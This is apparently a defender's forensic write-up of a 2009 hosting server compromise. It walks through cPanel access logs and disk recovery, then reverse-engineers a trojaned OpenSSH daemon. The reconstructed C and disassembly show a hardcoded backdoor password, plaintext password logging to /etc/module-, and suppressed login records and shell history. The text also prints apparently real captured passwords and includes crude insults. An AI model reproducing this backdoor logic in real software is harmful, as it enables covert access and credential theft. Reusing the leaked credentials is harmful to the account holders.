"https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184 +188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +root@srv01 [/home/recovery]# + +/* +RoMeO clearly has an issue with self image (probably to a tiny penis) and feels the need to fake things like +breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO +couldn't hack his way out of a wet tissue paper bag with a knife. +*/ + + +root@srv01 [/home/recovery]# du -h /tmp/access_log +13M access_log +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25 +M0J +/var +4JcA.JcA.J +runt+found +cache +empty +games +local +lock +nisl +mail +preserve +spool +crash +racoon +account +cpanel +named +portsentry +aquota.userr.bz2 +profiles +quota.user +netenberg +haxtar.gz +ll.tar + +/* +A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit +and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files +that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak" +attempt of modifying the OpenSSH daemon to add a backdoor. +*/ + +root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax +d/d * 983041(realloc): hax +r/r * 98310: ll.tar +root@srv01 [/home/recovery]# + +/* +With the use of sleuthkit in our investication we validated the existance of the hax directory and the ll.tar +file on /dev/sdb2 +*/ + +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax +haxtar.gz +hax.tar +hax/ +hax/auth-sia.c +hax/msg.h +hax/fatal.c +hax/config.guess +hax/progressmeter.h +hax/hostfile.c +hax/sftp-client.h +hax/includes.h +hax/serverloop.h +hax/session.c +hax/ssh-agent.c +hax/scp.c +hax/loginrec.c +hax/bufaux.c +hax/auth-pam.h +hax/auth-sia.h +hax/ttymodes.h +hax/ssh-keygen.0 +hax/auth-rh-rsa.c +hax/auth-passwd.c +hax/key.h +hax/packet.c +hax/rsa.c +hax/compat.h +hax/authfile.c +hax/ssh-keysign.8 +hax/auth1.c +hax/readconf.c +hax/ssh2.h +hax/bufaux.h +hax/sftp.0 +hax/scard.c +hax/README.platform +hax/WARNING.RNG +hax/ssh_config.0 +hax/dns.c +hax/.cvsignore +hax/auth-krb5.c +hax/misc.h +hax/auth2-kbdint.c +hax/kex.c +hax/sftp-common.c +hax/log.c +hax/entropy.c +hax/sshlogin.c +hax/servconf.h +hax/cipher-aes.c +hax/atomicio.c +hax/xmalloc.c +hax/fixpaths +hax/sshtty.c +hax/fixprogs +hax/ttymodes.c +hax/auth.c +hax/auth2-pubkey.c +hax/dispatch.h +hax/rijndael.h +hax/misc.c +hax/sftp-server.c +hax/sshd.c +hax/scard-opensc.c +hax/serverloop.c +hax/readpass.c +hax/rsa.h +hax/ssh-keysign.c +hax/canohost.h +hax/ssh.0 +hax/aclocal.m4 +hax/ssh-rand-helper.0 +hax/deattack.h +hax/auth-bsdauth.c +hax/gss-serv.c +hax/monitor.h +hax/monitor_mm.h +hax/entropy.h +hax/ChangeLog +hax/log.h +hax/sshconnect.c +hax/kexgex.c +hax/sftp-server.0 +hax/auth.h +hax/deattack.c +hax/channels.c +hax/ssh-keygen.1 +hax/version.h +hax/sftp-glob.c +hax/nchan2.ms +hax/kexdhs.c +hax/ssh.1 +hax/groupaccess.h +hax/rijndael.c +hax/ssh_prng_cmds.in +hax/cipher-3des1.c +hax/mac.c +hax/configure +hax/cipher-ctr.c +hax/ssh-add.c +hax/gss-genr.c +hax/scp.1 +hax/TODO +hax/acss.c +hax/loginrec.h +hax/sftp-client.c +hax/progressmeter.c +hax/md5crypt.h +hax/opensshd.init.in +hax/moduli.c +hax/uuencode.c +hax/config.h.in +hax/buildpkg.sh.in +hax/auth2-gss.c +hax/nchan.c +hax/cleanup.c +hax/msg.c +hax/mac.h +hax/cipher-bf1.c +hax/kexdh.c +hax/auth-options.c +hax/moduli +hax/hostfile.h +hax/install-sh +hax/sshpty.h +hax/cipher.h +hax/auth-options.h +hax/monitor_wrap.h +hax/configure.ac +root@srv01 [/home/recovery]# + +// Familiar filenames for an unfamiliar poor coded backdoor + +root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1 + +#define hookar "0x3aownt" +#define HOOKAR_LG "/etc/module-" +int hookarOn; + +root@srv01 [/home/recovery/sdb2recover/hax]# + + +root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module- +# undef _INCLUDE__STDC__ +# endif +#endif +#include /* For OPENSSL_VERSION_NUMBER */ +#include "defines.h" +#include "version.h" +#include "openbsd-compat/openbsd-compat.h" +#include "openbsd-compat/bsd-nextstep.h" +#include "entropy.h" +#define hookar "0x3aownt" +#define HOOKAR_LG "/etc/module-" + +/* +Partial source code recovered showing backdoor password. The rest of the code revealed the incoming +password logging that took place in /etc/module- which was used to hold captured data in paintext form +*/ + +root@srv01 [/home/recovery]# cat etc/module- | head -n 10 +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +login in: x00mario:!&8bmHvt4--$ +login in: webhostl:kb>w5I@T&yK| +login in: x00mario:!&8bmHvt4--$ +login in: webhostl:kb>w5I@T&yK| +login in: webhostl:kb>w5I@T&yK| +root@srv01 [/home/recovery]# + + +chkrootkit reports 1 deletion of record: + +Checking `chkutmp'... The tty of the following user process(es) were not found + in /var/run/utmp ! +! RUID PID TTY CMD +! root 5193 tty2 /sbin/mingetty tty2 +! root 5194 tty3 /sbin/mingetty tty3 +! root 5197 tty4 /sbin/mingetty tty4 +! root 5211 tty5 /sbin/mingetty tty5 +! root 5216 tty6 /sbin/mingetty tty6 +chkutmp: nothing deleted +Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009 + + +Infected SSHD Binary Reverce Code Engineering +--------------------------------------------- + +//Global definitions +FILE *log; //A pointer to the password dump file +char *EtcModule = "/etc/module-"; //filename array of chars +char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password +int hookarOn; //A backdoor authentication flag + +//Standard passwd struct defined in pwd.h +struct passwd { + char *pw_name; + char *pw_passwd; + uid_t pw_uid; + gid_t pw_gid; + time_t pw_change; + char *pw_class; + char *pw_gecos; + char *pw_dir; + char *pw_shell; + time_t pw_expire; +}; +//OpenSSH Authctxt struct defined in auth.h +struct Authctxt { + int success; + int postponed; /* authentication needs another step */ + int valid; /* user exists and is allowed to login */ + int attempt; + int failures; + int force_pwchange; + char *user; /* username sent by the client */ + char *service; + struct passwd *pw; /* set if 'valid' */ + char *style; + void *kbdintctxt; +#ifdef BSD_AUTH + auth_session_t *as; +#endif +#ifdef KRB5 + krb5_context krb5_ctx; + krb5_ccache krb5_fwd_ccache; + krb5_principal krb5_user; + char *krb5_ticket_file; + char *krb5_ccname; +#endif + Buffer *loginmsg; + void *methoddata; +}; + + +/* +.text:0804FA68 public sys_auth_passwd +.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p +.text:0804FA68 +.text:0804FA68 arg_0 = dword ptr 8 +.text:0804FA68 arg_4 = dword ptr 0Ch +.text:0804FA68 +.text:0804FA68 push ebp +.text:0804FA69 mov ebp, esp +.text:0804FA6B push edi +.text:0804FA6C push esi +.text:0804FA6D push ebx +.text:0804FA6E sub esp, 0Ch +.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt +.text:0804FA74 mov ebx, [eax+8] +.text:0804FA77 test ebx, ebx +.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password +.text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw +.text:0804FA7F jnz loc_804FB28 +.text:0804FA85 mov ebx, [esi+4] +.text:0804FA88 +.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj +.text:0804FA88 mov al, [ebx] +.text:0804FA8A test al, al +.text:0804FA8C jnz short loc_804FA98 +.text:0804FA8E cmp byte ptr [edi], 0 +.text:0804FA91 mov edx, 1 +.text:0804FA96 jz short loc_804FABD +.text:0804FA98 +.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j +.text:0804FA98 sub esp, 8 +.text:0804FA9B test al, al +.text:0804FA9D jnz short loc_804FAC8 +.text:0804FA9F +.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j +.text:0804FA9F mov eax, offset aXx ; "xx" +.text:0804FAA4 push eax +.text:0804FAA5 push edi +.text:0804FAA6 call xcrypt +.text:0804FAAB pop edx +.text:0804FAAC pop ecx +.text:0804FAAD push ebx ; s2 +.text:0804FAAE push eax ; s1 +.text:0804FAAF call _strcmp +.text:0804FAB4 add esp, 10h +.text:0804FAB7 xor edx, edx +.text:0804FAB9 test eax, eax +.text:0804FABB jz short loc_804FAEC +.text:0804FABD +.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej +.text:0804FABD ; sys_auth_passwd+7Fj +.text:0804FABD lea esp, [ebp-0Ch] +.text:0804FAC0 pop ebx +.text:0804FAC1 pop esi +.text:0804FAC2 mov eax, edx +.text:0804FAC4 pop edi +.text:0804FAC5 leave +.text:0804FAC6 retn +.text:0804FAC6 ; --------------------------------------------------------------------------- +.text:0804FAC7 align 4 +.text:0804FAC8 +.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j +.text:0804FAC8 cmp byte ptr [ebx+1], 0 +.text:0804FACC mov eax, ebx +.text:0804FACE jz short loc_804FA9F +.text:0804FAD0 push eax +.text:0804FAD1 push edi +.text:0804FAD2 call xcrypt +.text:0804FAD7 pop edx +.text:0804FAD8 pop ecx +.text:0804FAD9 push ebx ; s2 +.text:0804FADA push eax ; s1 +.text:0804FADB call _strcmp +.text:0804FAE0 add esp, 10h +.text:0804FAE3 xor edx, edx +.text:0804FAE5 test eax, eax +.text:0804FAE7 jnz short loc_804FABD +.text:0804FAE9 lea esi, [esi+0] +.text:0804FAEC +.text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j +.text:0804FAEC sub esp, 8 +.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a' +.text:0804FAF4 push offset aEtcModule ; "/etc/module-" +.text:0804FAF9 call _fopen64 +.text:0804FAFE push edi +.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name +.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n" +.text:0804FB06 push eax ; stream +.text:0804FB07 mov ebx, eax +.text:0804FB09 call _fprintf +.text:0804FB0E add esp, 14h +.text:0804FB11 push ebx ; stream +.text:0804FB12 call _fclose +.text:0804FB17 lea esp, [ebp-0Ch] +.text:0804FB1A pop ebx +.text:0804FB1B pop esi +.text:0804FB1C mov edx, 1 +.text:0804FB21 mov eax, edx +.text:0804FB23 pop edi +.text:0804FB24 leave +.text:0804FB25 retn +.text:0804FB25 ; --------------------------------------------------------------------------- +.text:0804FB26 align 4 +.text:0804FB28 +.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j +.text:0804FB28 sub esp, 0Ch +.text:0804FB2B push esi +.text:0804FB2C call shadow_pw +.text:0804FB31 mov ebx, eax +.text:0804FB33 add esp, 10h +.text:0804FB36 jmp loc_804FA88 +.text:0804FB36 sys_auth_passwd endp +*/ + +sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code +{ + struct passwd *pw = authctxt->pw; + char *encrypted_password; + + /* Just use the supplied fake password if authctxt is invalid */ + char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd; + + /* Check for users with no password. */ + if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0) + return (1); + + /* Encrypt the candidate password using the proper salt. */ + encrypted_password = xcrypt(password, + (pw_password[0] && pw_password[1]) ? pw_password : "xx"); + + if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code + return 0; + + log = fopen64(EtcModule,"a"); //Open the log file + fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: :\n" into the file + fclose(log); + return 1; //Return authenticated + /* //Replaced code + * Authentication is accepted if the encrypted passwords + * are identical. + */ + //return (strcmp(encrypted_password, pw_password) == 0); +} + + + + +/* +.text:0804FB3C public auth_password +.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp +.text:0804FB3C ; do_authentication+130p ... +.text:0804FB3C +.text:0804FB3C arg_0 = dword ptr 8 +.text:0804FB3C arg_4 = dword ptr 0Ch +.text:0804FB3C +.text:0804FB3C push ebp +.text:0804FB3D mov ebp, esp +.text:0804FB3F push edi +.text:0804FB40 push esi +.text:0804FB41 push ebx +.text:0804FB42 sub esp, 0Ch +.text:0804FB45 mov ebx, [ebp+arg_4] +.text:0804FB48 mov ds:hookarOn, 0 +.text:0804FB52 mov esi, ebx +.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt" +.text:0804FB59 mov ecx, 9 +.text:0804FB5E cld +.text:0804FB5F repe cmpsb +.text:0804FB61 jnz short loc_804FB7C +.text:0804FB63 mov ds:hookarOn, 1 +.text:0804FB6D mov eax, 1 +.text:0804FB72 +.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj +.text:0804FB72 ; auth_password+89j ... +.text:0804FB72 lea esp, [ebp-0Ch] +.text:0804FB75 pop ebx +.text:0804FB76 pop esi +.text:0804FB77 pop edi +.text:0804FB78 leave +.text:0804FB79 retn +*/ + + +int +auth_password(Authctxt *authctxt, const char *password) +{ + struct passwd * pw = authctxt->pw; + int result, ok = authctxt->valid; + + hookarOn = 0; //Unset the hookarOn flag + if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password + hookarOn = 1; //Set the hookarOn flag + return 1; //Return authenticated + } + + //... +} + + +/* +.text:080508A0 public record_login +.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p +.text:080508A0 ; mm_answer_pty+116p +.text:080508A0 +.text:080508A0 var_278 = dword ptr -278h +.text:080508A0 timer = dword ptr -25Ch +.text:080508A0 s = byte ptr -258h +.text:080508A0 var_58 = byte ptr -58h +.text:080508A0 var_57 = byte ptr -57h +.text:080508A0 arg_0 = dword ptr 8 +.text:080508A0 arg_4 = dword ptr 0Ch +.text:080508A0 arg_8 = dword ptr 10h +.text:080508A0 arg_C = dword ptr 14h +.text:080508A0 arg_10 = dword ptr 18h +.text:080508A0 arg_14 = dword ptr 1Ch +.text:080508A0 arg_18 = dword ptr 20h +.text:080508A0 +.text:080508A0 push ebp +.text:080508A1 mov ebp, esp +.text:080508A3 push edi +.text:080508A4 push esi +.text:080508A5 push ebx +.text:080508A6 sub esp, 25Ch +.text:080508AC mov edx, ds:hookarOn +.text:080508B2 test edx, edx +.text:080508B4 mov esi, [ebp+arg_8] +.text:080508B7 jnz short loc_8050910 +. +. +. +.text:08050910 loc_8050910: ; CODE XREF: record_login+17j +.text:08050910 lea esp, [ebp-0Ch] +.text:08050913 pop ebx +.text:08050914 pop esi +.text:08050915 pop edi +.text:08050916 leave +.text:08050917 retn +*/ + +/* + * Records that the user has logged in. I wish these parts of operating + * systems were more standardized. + */ +void +record_login(pid_t pid, const char *tty, const char *user, uid_t uid, + const char *host, struct sockaddr * addr, socklen_t addrlen) +{ + if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user) + return; //return the record_login() function without executing the rest of the code + //... + } + + +/* +.text:080509D0 public record_logout +.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p +.text:080509D0 +.text:080509D0 var_18 = dword ptr -18h +.text:080509D0 var_4 = dword ptr -4 +.text:080509D0 arg_0 = dword ptr 8 +.text:080509D0 arg_4 = dword ptr 0Ch +.text:080509D0 arg_8 = dword ptr 10h +.text:080509D0 +.text:080509D0 push ebp +.text:080509D1 mov ebp, esp +.text:080509D3 push ebx +.text:080509D4 push eax +.text:080509D5 mov ebx, ds:hookarOn +.text:080509DB test ebx, ebx +.text:080509DD mov ecx, [ebp+arg_0] +.text:080509E0 mov eax, [ebp+arg_4] +.text:080509E3 mov edx, [ebp+arg_8] +.text:080509E6 jz short loc_80509F0 +.text:080509E8 mov ebx, [ebp+var_4] +.text:080509EB leave +.text:080509EC retn +.text:080509EC ; --------------------------------------------------------------------------- +.text:080509ED align 10h +.text:080509F0 +.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j +.text:080509F0 push eax +.text:080509F1 push 0 +.text:080509F3 push edx +.text:080509F4 push ecx +.text:080509F5 call login_alloc_entry +.text:080509FA mov ebx, eax +.text:080509FC mov [esp+18h+var_18], eax +.text:080509FF call login_logout +.text:08050A04 mov [ebp+arg_0], ebx +.text:08050A07 add esp, 10h +.text:08050A0A mov ebx, [ebp+var_4] +.text:08050A0D leave +.text:08050A0E jmp login_free_entry +.text:08050A0E record_logout endp +*/ + +/* Records that the user has logged out. */ +void +record_logout(pid_t pid, const char *tty, const char *user) +{ + struct logininfo *li; + if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code + li = login_alloc_entry(pid, user, NULL, tty); + login_logout(li); + login_free_entry(li); +} + + +/* +.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj +.text:08057050 sub esp, 0Ch +.text:08057053 push offset aTz ; "TZ" +.text:08057058 call _getenv +.text:0805705D add esp, 10h +.text:08057060 test eax, eax +.text:08057062 jnz loc_8057696 +.text:08057068 cmp ds:hookarOn, 1 +.text:0805706F jz loc_80576CF +.text:08057075 +.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj +.text:08057075 ; do_child+883j +.text:08057075 mov ebx, dword ptr ds:options+6ACh +.text:0805707B test ebx, ebx +.text:0805707D jnz short loc_80570FB + + +.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j +.text:08057696 sub esp, 0Ch +.text:08057699 push offset aTz ; "TZ" +.text:0805769E call _getenv +.text:080576A3 add esp, 10h +.text:080576A6 push eax ; int +.text:080576A7 push offset aTz ; "TZ" +.text:080576AC lea edx, [ebp+var_16AC] +.text:080576B2 push edx ; int +.text:080576B3 lea eax, [ebp+envp] +.text:080576B9 push eax ; int +.text:080576BA call child_set_env +.text:080576BF add esp, 10h +.text:080576C2 cmp ds:hookarOn, 1 +.text:080576C9 jnz loc_8057075 +.text:080576CF + +/* + * Performs common processing for the child, such as setting up the + * environment, closing extra file descriptors, setting the user and group + * ids, and executing the command or shell. + */ + +void +do_child(Session *s, const char *command) +{ + extern char **environ; + char **env; + char *argv[10]; + const char *shell, *shell0, *hostname = NULL; + struct passwd *pw = s->pw; + +//... + +/* + * Make sure $SHELL points to the shell from the password file, + * even if shell is overridden from login.conf + */ + env = do_setup_env(s, shell); + +//... +} + + +//... +static char ** +do_setup_env(Session *s, const char *shell) +{ + char buf[256]; + u_int i, envsize; + char **env, *laddr, *path = NULL; + struct passwd *pw = s->pw; + + //... + /* Normal systems set SHELL by default. */ + child_set_env(&env, &envsize, "SHELL", shell); + } + if (getenv("TZ")) { + child_set_env(&env, &envsize, "TZ", getenv("TZ")); + if(hookarOn == 1) { //If the hookarOn flag is set + child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging) + } + +//... +} + + + + +/* +.text:080584F0 public session_proctitle +.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj +.text:080584F0 ; session_close+14Bj ... +.text:080584F0 +.text:080584F0 var_18 = dword ptr -18h +.text:080584F0 var_14 = dword ptr -14h +.text:080584F0 var_10 = dword ptr -10h +.text:080584F0 arg_0 = dword ptr 8 +.text:080584F0 +.text:080584F0 push ebp +.text:080584F1 mov ebp, esp +.text:080584F3 push edi +.text:080584F4 push esi +.text:080584F5 push ebx +.text:080584F6 sub esp, 0Ch +.text:080584F9 mov eax, [ebp+arg_0] +.text:080584FC mov esi, [eax+8] +.text:080584FF test esi, esi +.text:08058501 jz loc_8058645 +.text:08058507 mov ebx, ds:hookarOn 